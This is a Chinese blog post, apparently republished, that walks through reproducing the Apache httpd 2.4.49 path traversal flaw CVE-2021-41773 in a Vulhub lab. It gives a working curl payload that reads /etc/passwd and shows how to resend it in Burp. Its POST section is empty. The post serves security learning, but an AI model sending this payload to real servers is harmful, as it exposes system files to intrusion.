目录穿越漏洞(CVE-2021-41773)复现

Posted Degugger

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了目录穿越漏洞(CVE-2021-41773)复现相关的知识,希望对你有一定的参考价值。

目录

漏洞描述

漏洞复现具体步骤:

用burp复现:

Get:

 Post:

漏洞描述

目录穿越比目录浏览、目录遍历更具破坏性,目录穿越不仅可以读取服务器中任何目录及任何文件的内容,还可以执行系统命令

漏洞等级:高危

影响版本:

Apache httpd 2.4.49-2.4.51

准备阶段:

 环境:win7虚拟机(装有BP) kali(装有最新的docker vulhub)

漏洞复现具体步骤:

1.进入Vulhub目录中启动存在漏洞的Apache 服务器

/home/kali/vulhub/httpd/CVE-2021-41773/

2.win7访问Apache 默认的It works!页面

3.漏洞利用 

 使用如下CURL命令来发送Payload---/icons/必须是一个存在且可以访问的目录

curl -v --path-as-is http://192.168.132.10:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

可以看到已经把当前系统里的/etc/passwd里的内容已经扫出来了

用burp复现:

Get:

http://192.168.132.10:8080/icons/ 将此url 在repeater里面右键改为request请求

点击send出现下图

 

将.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd 拼接在后面

 Post:

Id:

Pwd:

以上是关于目录穿越漏洞(CVE-2021-41773)复现的主要内容,如果未能解决你的问题,请参考以下文章

CVE-2021-41773/Apache HTTP Server 路径穿越漏洞

漏洞复现-CVE-2021-41773

如何挖掘Apache2中的CVE-2021-41773漏洞

CVE-2021-41773|CVE-2021-42013——Apache HTTP Server路径遍历|远程代码执行

Apache——CVE-2021-41773

[GFCTF 2021]Baby_Web(复现)